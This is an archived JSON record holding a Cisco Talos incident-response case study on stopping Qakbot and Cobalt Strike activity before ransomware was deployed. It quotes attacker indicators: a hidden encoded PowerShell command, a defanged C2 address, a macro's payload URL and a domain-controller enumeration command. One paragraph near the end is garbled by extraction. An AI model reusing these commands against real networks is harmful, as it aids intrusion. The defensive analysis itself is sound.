{ "id": "a66d35ca-f0db-4e38-825e-88c095d7420b", "created_at": "2026-04-06T00:18:12.116013Z", "updated_at": "2026-04-10T13:13:09.225764Z", "deleted_at": null, "sha1_hash": "8cc77c6b486915100ab1d22920d4487849a8f0fa", "title": "Case Study: Incident Response is a relationship-driven business", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 919363, "plain_text": "Case Study: Incident Response is a relationship-driven business\r\nBy Jonathan Munshaw\r\nPublished: 2021-05-17 · Archived: 2026-04-05 15:02:02 UTC\r\nCase Study: Incident Response is a relationship-driven business\r\nMonday, May 17, 2021 08:00\r\nProof that incident response is \"the ultimate team sport\"\r\nBy Brad Garnett.\r\nhttps://blog.talosintelligence.com/2021/05/ctir-case-study.html\r\nPage 1 of 7\n\nIntroduction\r\nAs a seasoned incident responder, and now IR business leader here at Cisco Talos Incident Response (CTIR), I\r\nhave always said that incident response is the ultimate team sport. People are building blocks for organizations —\r\nand an effective incident response is about people, relationships and leveraging those relationships into the\r\nincident response workflow (processes and security instrumentation). This all plays a part in effectively containing\r\nand eradicating a determined adversary from the organization’s network environment.\r\nTo highlight this, I want to share a recent CTIR engagement that shows how we can work together with an\r\norganization’s IR and IT teams to quickly contain and remediate a threat. In this case, we dealt with an adversary\r\nthat could critically affect a business by deploying ransomware and virtually completely shutting down their\r\nnetwork. One of my favorite parts about my role with CTIR is the customer relationships I get to build around the\r\nworld by leveraging our awesome Cisco Secure collaboration technology to work from anywhere and at home\r\nduring the pandemic. I hear first-hand about the challenges and successes our customers have facing today’s most\r\nchallenging threats.\r\nThis customer case study I am going to highlight is a publicly traded company with more than $8 billion in\r\nrevenue. This incident was even more complicated because the company was going through a merger and\r\nacquisition when the customer CISO received a phone call from my organization. This customer had an existing\r\nIR retainer with us and has a strong relationship with my organization — to the extent that we are viewed as an\r\nextended team. We notified this customer after we identified suspicious Cobalt Strike activity and TTPs consistent\r\nwith pre-ransomware activity via SecureX telemetry.\r\n“Our Cisco Talos partners recognize the critical role relationships play in cybersecurity and Incident\r\nResponse. The Talos Team has invested significant time and effort in us to fully understand our people\r\nand environment before an incident occurred. Together, we built familiarity and trust between our teams\r\nthat can only be obtained through constant engagement and drills. When we were faced with a\r\nsignificant security incident, that trust and familiarity were the key differentiators that enabled us to\r\nsuccessfully contain the threat and minimize damages,” customer CISO. \r\nInitial notification\r\nDuring the initial notification, we supplied our customer with the specific hostname and indicators we contacted\r\nthem about. Below is the initial Cobalt Strike beacon that we identified in global telemetry:\r\ncmd.exe executed powershell -nop -w hidden -encodedcommand \u003credacted_base64_string\u003e \r\nFollowed by the following for command and control (C2):\r\ncmd.exe executed powershell -nop -w hidden -encodedcommand \u003credacted_base64_string\u003e \r\npowershell.exe Connected to 95[.]174[.]65[.]241[:]4444 \r\nNote: Please visit the Talos Reputation Center for accurate threat information.\r\nDetection and analysis\r\nhttps://blog.talosintelligence.com/2021/05/ctir-case-study.html\r\nPage 2 of 7\n\nThis blog post will only highlight endpoint analysis, but the same approach was included in our analysis plan for\r\nthe two compromised domain controllers.\r\nBased upon our global SecureX telemetry and the customer’s Cisco Secure Endpoint deployment, we were\r\nidentified patient zero and focused our forensic analysis efforts on three key systems as part of our analysis plan:\r\n1. Endpoint (Patient Zero): Windows 10 Enterprise 1909\r\n2. Domain Controller 1 (DC1): Windows Server 2016 Standard\r\n3. Domain Controller 2 (DC2): Windows Server 2012 R2 Standard\r\nhttps://blog.talosintelligence.com/2021/05/ctir-case-study.html\r\nPage 3 of 7\n\nPatient zero (Windows 10 endpoint)\r\nhttps://blog.talosintelligence.com/2021/05/ctir-case-study.html\r\nPage 4 of 7\n\nATT\u0026CK Technique with Sub-Technique (T1204.002) User Execution: Malicious File\r\nForensic analysis of the patient zero endpoint found that the file Document_1223672987_11142020.zip was\r\ndownloaded to \\Users\\%Compromised_User%\\Downloads. The RecentDocs registry entry shows that the user\r\nopened the ZIP archive shortly after the file was downloaded. Analysis of the Excel document contained within\r\nDocument_1223672987_11142020.zip showed a malicious macro that was set to execute once the document was\r\nopened. This macro attempted to download a payload from\r\n“http[:]//redacted[.]com/bpebqznfbkgl/55555555555.jpg”. This payload was then stored on the system in the\r\n“C:\\IntelCompany” folder and executed using the rundll32 executable. The analysis also shows that the payload\r\ndelivered by this document is the Qakbot banking trojan. The user was not warned of the macros existence before\r\nit was executed because this host was configured to trust all macros and all Excel documents from the internet.\r\nATT\u0026CK Technique with Sub-Technique (T1059.001) Command and Scripting Interpreter: PowerShell\r\nWe observed multiple executions of Cobalt Strike beacon-encoded PowerShell payloads from the\r\n‘Compromised_User’ user during the analysis of the Windows PowerShell event log.\r\nAnalysis of the encoded payloads revealed that the Cobalt Strike command and control traffic was configured to\r\nuse the following user agents:\r\nhttps://blog.talosintelligence.com/2021/05/ctir-case-study.html\r\nPage 5 of 7\n\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/74.0.3729.157 Safari/537.36 \r\nWindows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40 \r\nThe PowerShell event log also showed that at 2020-11-20T16:58:22Z, the following PowerShell command was\r\nexecuted to enumerate the domain controllers on the domain:\r\npowershell\r\n[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | Select\r\n-property Name,IPAddress,OSVersion \r\nATT\u0026CK Technique with Sub-Technique (T1087.002) Account Discovery: Domain Account\r\nATT\u0026CK Technique (T1018) Remote System Discovery\r\nDuring analysis of the Master File Table ($MFT), we concluded that at 2020-11-20T17:55:29Z\r\n“20201120104627_BloodHound.zip”, which was an archive containing an open-source tool known as\r\nBloodHound used for enumerating windows domains, was downloaded to the “\\Users\\Public” folder. At 2020-11-\r\n20T18:22:00Z, the file “20201120132133_users.json” was created in\r\n“\\Users\\%Compromised_User%\\Downloads”. Although the contents of the file were not included in the evidence\r\ncollected, our assumption based upon supporting evidence is that this file is an output file from the execution of\r\nbloodhound containing information about the users within the domain. Similarly, at 2020-11-20T20:40:00Z the\r\nfile “20201120132133_computers.json” was created in the “\\Users\\%Compromised_User%\\Downloads” folder.\r\nWe concluded with high confidence that this file contained BloodHound output with information about the hosts\r\nwithin the domain.\r\nContainment, eradication and recovery\r\nThe collaborative, joint incident response between the customer’s IR team and CTIR led to a quick containment\r\nand full eradication of an active adversary in the enterprise IT environment that had the capability to deploy\r\nransomware. During these phases of the incident response, there were various actions performed, including but\r\nnot limited to, re-imaging the patient zero endpoint, password resets, and the deployment of additional GPOs to\r\nrestrict document macros, PowerShell and SMB/ Admin Shares. In every incident response, there are lessons\r\nlearned. This is how organizations continue to evolve defense and detection capabilities, threat models, and\r\nincident response plans and playbooks. If your organization is interested in any of these services, please reach out\r\nto CTIR for more information.\r\nPost-incident activity\r\nDuring our post-incident briefing with this customer and its executive leadership, we commended the customer\r\nand their entire organization for their swift response and collaboration with CTIR to successfully contain and\r\neradicate a determined adversary that likely would’ve caused millions of dollars in lost revenue and recovery\r\nexpenses. I am humbled to share this joint success story, as a lot of IR organizations are summoned once\r\nhttps://blog.talosintelligence.com/2021/05/ctir-case-study.html\r\nPage 6 of 7\n\nransomware has been deployed and the entire organization has affected, which is something that we observe\r\nglobally and across industry verticals in our quarterly IR trends.\r\nConclusion\r\nI am grateful for the mutual, high-trust relationship between this customer and my organization. Incident response\r\nis a relationship-driven business. CTIR retainers are critical for organizations to augment their IR capabilities. A\r\ntested incident response plan that accurately reflects your organization’s current capabilities is critical, as\r\nevidenced in the two Case Studieswe released today. Organizational and third-party relationships are tested during\r\na crisis. It’s important that there is an elevated level of trust between IR team and client, and that there is an\r\nestablished and agreed-upon process when time is of the essence to prevent an enterprise-wide ransomware attack\r\nwhen adversary pre-ransomware activity is identified. CISOs and executives should review and refine third-party\r\nrelationships on a routine basis. Have your third-party IR relationships been tried and tested — and are those\r\nrelationships resilient?\r\nIf you want to learn more about CTIR, check out our website here and visit us at this year’s virtual RSA\r\nConference this week.\r\nSource: https://blog.talosintelligence.com/2021/05/ctir-case-study.html\r\nhttps://blog.talosintelligence.com/2021/05/ctir-case-study.html\r\nPage 7 of 7\n\nBased upon our identified patient global SecureX zero and focused telemetry and our forensic the customer’s Cisco analysis efforts on Secure Endpoint three key systems deployment, as part of we were our analysis plan:\n1. Endpoint (Patient Zero): Windows 10 Enterprise 1909\n2. Domain Controller 1 (DC1): Windows Server 2016 Standard\n3. Domain Controller 2 (DC2): Windows Server 2012 R2 Standard\n Page 3 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://blog.talosintelligence.com/2021/05/ctir-case-study.html" ], "report_names": [ "ctir-case-study.html" ], "threat_actors": [ { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434692, "ts_updated_at": 1775826789, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8cc77c6b486915100ab1d22920d4487849a8f0fa.pdf", "text": "https://archive.orkl.eu/8cc77c6b486915100ab1d22920d4487849a8f0fa.txt", "img": "https://archive.orkl.eu/8cc77c6b486915100ab1d22920d4487849a8f0fa.jpg" } }